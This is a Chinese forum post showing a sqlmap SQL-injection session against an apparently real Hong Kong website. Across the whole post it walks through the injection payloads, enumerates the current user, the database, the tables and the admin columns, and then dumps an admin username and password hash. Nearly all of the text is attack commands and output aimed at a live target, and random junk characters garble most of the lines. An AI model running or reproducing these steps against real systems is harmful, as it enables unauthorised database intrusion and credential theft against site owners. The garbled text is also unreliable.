D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 q' i% E6 {+ X1 d$ Gms "Mysql" --current-user /* 注解:获取当前用户名称0 X m: W! r, d- q$ b
sqlmap/0.9 - automatic SQL injection and database takeover tool
" _- V* e/ H- O http://sqlmap.sourceforge.net starting at: 16:53:545 v5 n: y* _+ ?6 B2 |; h! g) T
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
# T7 {* B* K* j session file
! a# |7 x8 X A6 i[16:53:54] [INFO] resuming injection data from session file$ {0 B( o7 V+ \
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ {; Z1 A1 q7 F7 ]$ L/ V[16:53:54] [INFO] testing connection to the target url
9 B. N* R" @/ @3 q* Esqlmap identified the following injection points with a total of 0 HTTP(s) reque
6 q8 D2 k3 y; @/ i) R% \sts:
" h9 l- g0 u+ ~) }9 R# P---
. y9 ^: C2 ]% V9 {9 D5 i7 zPlace: GET& [1 ^! d; q; k
Parameter: id% z2 l! T5 a6 a3 U% a1 e
Type: boolean-based blind
/ a, U/ l" W y N Title: AND boolean-based blind - WHERE or HAVING clause& e9 V4 m- h( i- q
Payload: id=276 AND 799=799
2 O z' G' d! b, N( J `, B3 I Type: error-based
m# I1 Q) X6 ^1 w Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; ]% p w9 H6 Z& E% b; J1 R( ~$ {; E
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( ^; g$ `6 ^' I8 g: Q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 }; |5 R7 B0 X; g1 K),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
, \6 D x- Q: G; \: y1 J7 v Type: UNION query2 o, y; y/ B) n: q0 A+ y
Title: MySQL UNION query (NULL) - 1 to 10 columns
' U D! d% z! | Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ ^4 L3 Q4 @9 K& {, o(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
% C" B1 i. v3 v& R6 {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; J9 x3 A) \+ k Y
Type: AND/OR time-based blind; t, I1 M# ?9 A X! @5 ]
Title: MySQL > 5.0.11 AND time-based blind
9 K3 R7 [5 {" ]3 O A Payload: id=276 AND SLEEP(5)! w" C7 b' K- F' G' g; K, {
---
" G5 G' ^9 r2 G8 p% @) V! Z0 M1 {2 U[16:53:55] [INFO] the back-end DBMS is MySQL
7 j1 j. e, L* }: |* v7 `9 jweb server operating system: Windows9 s, I: L4 F5 k5 W' y
web application technology: Apache 2.2.11, PHP 5.3.0
! @$ f8 s @4 Wback-end DBMS: MySQL 5.0. O5 v6 ~# F9 ]! I& l5 [
[16:53:55] [INFO] fetching current user9 E3 P3 Y4 i6 @3 U# S! |7 h
current user: 'root@localhost' 6 a# ]- b$ O- v& U- ?9 [
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou+ w# y8 O+ r+ [. O7 @4 A2 h4 t
tput\www.wepost.com.hk' shutting down at: 16:53:589 Z4 h, |2 e' K. D F& u6 k
7 k6 Y) L* w5 g" V$ O/ ?% G: t9 gD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' R$ I5 m+ Y* H+ t2 _ms "Mysql" --current-db /*当前数据库( k, j& Y/ y' r, C$ l$ f+ m
sqlmap/0.9 - automatic SQL injection and database takeover tool
( |0 ^' B! |: g/ A; }8 C) y$ P( K http://sqlmap.sourceforge.net starting at: 16:54:16
Y9 j" X6 @. ^8 z[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# D' k* X' W! ~% x/ u: S% H
session file
+ Q( i3 G( {+ h! a7 b |; i$ S[16:54:16] [INFO] resuming injection data from session file' y" R8 x: T' |# E& s. Z
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
/ j& W: i- d- {7 \ l4 c+ Y" q# } X[16:54:16] [INFO] testing connection to the target url
: D1 M7 x+ p3 ]/ g$ [7 J' wsqlmap identified the following injection points with a total of 0 HTTP(s) reque- a+ Y% Y' I( r% W, s9 R; |
sts:
l8 j# w9 t3 M& [/ `$ A---, ~7 `1 }% h% \" `, x, ?
Place: GET% e/ I4 O/ c5 Q1 M2 H
Parameter: id
( S" p, e0 G5 i i0 v Type: boolean-based blind' N- ?/ U0 q6 C1 Z- E
Title: AND boolean-based blind - WHERE or HAVING clause
4 x4 A7 F4 x* h9 v3 g4 n Payload: id=276 AND 799=799
; Z5 w& d) A" H6 K( p s7 x1 x. g* V Type: error-based
' \3 o- u @. F' J Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: e8 N9 q1 @3 s' {* W+ K( |9 Z8 |' e
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 j6 T% @, {$ H/ T
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
$ q$ o+ q( Z( W0 p3 P$ I3 ^),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 l3 q2 J% C# L
Type: UNION query% p: i# k$ c. w* Z: w
Title: MySQL UNION query (NULL) - 1 to 10 columns# z; \1 e! j: C( M
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 k2 }* P+ H0 m9 h) @* F
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 q# x5 L0 w# a/ n) R5 w
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ |' ]3 I& k; r! M5 L% a
Type: AND/OR time-based blind# z/ }! I' d6 k( Z' _, O
Title: MySQL > 5.0.11 AND time-based blind) j1 R$ W5 M# V1 v
Payload: id=276 AND SLEEP(5)
$ R. L3 j! c5 I. T---, Z$ L$ J' j% o- H: S
[16:54:17] [INFO] the back-end DBMS is MySQL" N; \: l! A- f, E! l- p
web server operating system: Windows! Z3 g) [. ~& l0 q! J( l) F
web application technology: Apache 2.2.11, PHP 5.3.0
8 f- `( c9 K" ?. j4 g0 K6 _back-end DBMS: MySQL 5.0' b; i# `; I M+ l
[16:54:17] [INFO] fetching current database
7 M9 a/ q2 y- V% l; ]8 h Ccurrent database: 'wepost'
) \. s _7 l0 d# v, r[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
3 N; m& v. e. f" M/ V) ktput\www.wepost.com.hk' shutting down at: 16:54:18
# X# v$ ^- \# o5 j0 vD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% W) ~5 [, v2 Pms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
6 i! e1 z! X! W% \2 L& l sqlmap/0.9 - automatic SQL injection and database takeover tool
! g0 S {) E) }% ?3 m# ~ http://sqlmap.sourceforge.net starting at: 16:55:25* G" K! M+ y. z( W8 B
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, [7 {* X" G* S( L4 T# D
session file" I4 @- @% D) E4 }% S2 ^2 i
[16:55:25] [INFO] resuming injection data from session file: G$ o" R4 o% l
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
& t8 r* \( q7 y[16:55:25] [INFO] testing connection to the target url( e( W+ H& x& t7 D- @/ U6 V/ j' b2 i
sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ q8 ^) X q6 V3 A
sts:9 r. s# B9 q7 y( \' i7 h
---2 \: w4 Z0 Y+ E% |3 O1 S
Place: GET
9 e$ r7 Q7 s+ Y( L$ Q) ~Parameter: id4 X5 q1 ^* j# A# D1 Z
Type: boolean-based blind
- J. O/ A1 ?( L3 g3 {& O Title: AND boolean-based blind - WHERE or HAVING clause0 D g8 B4 r. J. P, g
Payload: id=276 AND 799=799* ^; q. r' |; h, `) x
Type: error-based: a; d/ ?- ~5 w- g* N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause( s5 J; x( n& m, q7 ?1 W
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 X# I/ P! R: k3 \( u
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
: r4 C& B& s# R2 ? R9 t$ e),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
) U6 A6 \# n% A! b& K Type: UNION query) U: j( i R9 C+ C7 B5 F
Title: MySQL UNION query (NULL) - 1 to 10 columns
6 M& P9 C: L; m/ J8 X Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
9 _. ~- |& [4 g+ i: l7 Y! D$ E2 J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
x4 r0 w. e7 \+ a3 ~" S7 h7 V7 X! yCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
r+ g* `$ v/ e4 ~) Z( W4 I' Z" k" Z Type: AND/OR time-based blind
' M( \+ g3 `9 B3 J j Title: MySQL > 5.0.11 AND time-based blind
1 ]+ X3 ^; n% c5 H7 l6 K Payload: id=276 AND SLEEP(5)
& x5 Y9 D: P6 P6 t/ O---# H4 }3 N$ o, i6 t' z+ A
[16:55:26] [INFO] the back-end DBMS is MySQL
) K& G1 p4 q5 _4 D; Bweb server operating system: Windows. |: T1 P' `# Z) P
web application technology: Apache 2.2.11, PHP 5.3.0
4 G/ o' i( j$ `; J4 _$ P! Fback-end DBMS: MySQL 5.0
9 ]" \+ C# l2 J[16:55:26] [INFO] fetching tables for database 'wepost'
0 y. E, n' g1 k7 G[16:55:27] [INFO] the SQL query used returns 6 entries# v" ?; R# l J8 Q8 E
Database: wepost
A: D: `" O5 |- ^$ D: w1 @[6 tables]
3 h# ], O7 e d' w9 t2 |# Y1 j+-------------+
; I( ]' z) X/ ] G| admin |
' L- b" a- [" C( i! K" }| article |. V$ m/ U% @; W7 }6 P+ P' H5 C, [5 n+ n
| contributor |
1 V" s5 I" t. A6 x/ [| idea |
/ a: ]0 i; B7 p: L K| image |# s+ f0 O, \. \/ m
| issue |) w3 q2 h& Q' ]* v# j5 g8 t; m2 C
+-------------+
; i' q6 C$ J5 u' G7 A[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
7 W! ?# E9 d# a) [tput\www.wepost.com.hk' shutting down at: 16:55:33
& Q v& W, ~, v; W: g/ x0 L! @
9 p! W t) f2 _2 tD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db: W# t- D: G' C1 H" D
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
4 z2 m. q$ u. y sqlmap/0.9 - automatic SQL injection and database takeover tool5 v. Z1 k& X1 \- m
http://sqlmap.sourceforge.net starting at: 16:56:06
9 E7 p# y) T" V6 u2 Q- O9 `sqlmap identified the following injection points with a total of 0 HTTP(s) reque
2 h0 Z# W( V: J3 E I9 h2 Csts:* [7 v% s/ j, n/ Q2 W
---. O. A" u9 D. K& `, O
Place: GET
3 Z2 z* a1 m2 S$ fParameter: id
% l% [, i% z0 F* ~ n" b Type: boolean-based blind" A* K& {. q) _
Title: AND boolean-based blind - WHERE or HAVING clause
& v k0 k" g3 R2 k- d Payload: id=276 AND 799=799
9 Y {" w8 K8 J9 _/ t4 k* n- b9 n Type: error-based2 i8 B# B% [# S g
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
. a( l9 v1 m3 U) m Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: Z# j! C2 Y/ q4 l& C( b
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58. `% x. V# |: q2 ]
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). f1 J f+ I$ R! ?" Q/ E$ u$ X, [! ]
Type: UNION query* l& e0 u( `4 M) T
Title: MySQL UNION query (NULL) - 1 to 10 columns3 }- W7 E' ^0 B( _
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 g9 ~5 G |- V; L
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),2 o- O& X2 d& s0 K9 w' O4 h0 [
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 x% a% ^, H/ _& W, f; B* o$ j& m Type: AND/OR time-based blind
1 O( r( ~1 y8 J. L& Z5 I7 p \ Title: MySQL > 5.0.11 AND time-based blind: C1 \7 ?( S" `
Payload: id=276 AND SLEEP(5)
$ k$ e/ |; \ i---9 m1 t8 X% |: K2 {. q% w
web server operating system: Windows3 b1 j# w5 R' ~. b+ E/ `
web application technology: Apache 2.2.11, PHP 5.3.0, R- G7 t4 h4 ^: H+ a; T
back-end DBMS: MySQL 5.0$ b7 V9 ~$ f9 f0 e: A/ h% N- D- t# N
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
3 c8 C8 C" _5 n2 Bssion': wepost, wepost; l2 l$ M# O3 h/ F9 [% f$ B
Database: wepost3 ^2 m! @ Y @. v% z
Table: admin, b0 z2 [. G6 \& V
[4 columns]$ n" X* @& G; k$ d/ S
+----------+-------------+) A+ E" d3 {: P. K' d# ~; w
| Column | Type |
) D: n' `6 T2 Q) u5 ^7 z+----------+-------------+
. L" ?# d; h2 s# f+ i3 W. y" m| id | int(11) | O6 z$ H; v4 G, W6 X9 N
| password | varchar(32) |0 m8 g: U. @/ M/ d" m: u+ o; k6 U7 s
| type | varchar(10) |- x0 ]) X& X4 }# m) D
| userid | varchar(20) |' ~3 \6 d2 g2 M/ M4 w( `( ?
+----------+-------------+
: i r; E' q6 t shutting down at: 16:56:190 Y; F9 i3 C% z0 U6 Q
& W+ q) `- T$ b9 Y% ^5 n5 bD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, t, p- p) m! D; A# G
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容/ y- j& U2 G* B. u0 d
sqlmap/0.9 - automatic SQL injection and database takeover tool6 N9 P2 r& e6 ~$ w' ?- K: ^
http://sqlmap.sourceforge.net starting at: 16:57:14
- k4 T& e {/ `& G3 ssqlmap identified the following injection points with a total of 0 HTTP(s) reque9 q5 `, h4 M6 a2 Y1 x0 z' N( p
sts:
* i8 S9 r& B1 e/ g8 P# b---4 P2 V1 Z2 r7 a3 q) _
Place: GET
$ e |: o; q$ |Parameter: id u2 I$ O5 v5 H1 \
Type: boolean-based blind
/ I5 N8 I9 Y" Y) i5 R) `# Q$ G& K0 _3 N Title: AND boolean-based blind - WHERE or HAVING clause
% O) ?2 C L, ~) z Payload: id=276 AND 799=799
" F( A% [4 m( p) u! }8 ] Type: error-based
# \% S% ^5 N6 h" v0 B" _ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 Z% x, ?- f- M9 `
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
# D M+ Z, e" ]' A" P120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ _* _$ A2 Y( v. | @, [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 L( d: Z& n6 W1 N5 r, L
Type: UNION query3 z- M3 w* y2 R1 s9 e
Title: MySQL UNION query (NULL) - 1 to 10 columns
. r% h; j8 _* l; E, U& N/ H3 T( h Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
/ o( G. k G. X s(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. }: O" m, \! r% T
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: O9 t5 x' L) i$ `: o d+ l( q, w
Type: AND/OR time-based blind
: r9 z8 q: g+ N6 }/ b* L( Z3 t Title: MySQL > 5.0.11 AND time-based blind/ x; O, Z: _& a8 p* n
Payload: id=276 AND SLEEP(5)' g+ h3 u0 b6 H
---
$ A" S* h# I( `. g9 Bweb server operating system: Windows' e( A+ J1 S- n1 f2 |
web application technology: Apache 2.2.11, PHP 5.3.05 d5 _9 @5 ?, S, p6 N
back-end DBMS: MySQL 5.0
1 x+ ~- q0 t8 f! l! wrecognized possible password hash values. do you want to use dictionary attack o
! ?2 s1 M1 x; J* g3 Un retrieved table items? [Y/n/q] y) K) K- ~# N+ I' k9 ^/ q7 F
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
7 W! O, r% @# zdo you want to use common password suffixes? (slow!) [y/N] y) [5 ~$ _4 F- M
Database: wepost
5 x( \& U( d( K5 o. ^Table: admin
[* t) s& U. m! Z[1 entry]* z7 H# P H; ]$ U
+----------------------------------+------------+0 x1 P, ^6 A7 n/ ~5 O4 O; @1 ^. q
| password | userid |
7 A6 \4 v+ k: }/ Q2 ]+----------------------------------+------------+" e' p x7 N7 p5 Z
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |- c. I0 f E# {3 ~9 Z) K
+----------------------------------+------------+8 z" _' s$ P9 ], t2 D6 J
shutting down at: 16:58:14
, J$ O+ u9 L* r* R& B2 ?' y: F' D6 {1 K7 H# P- M
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对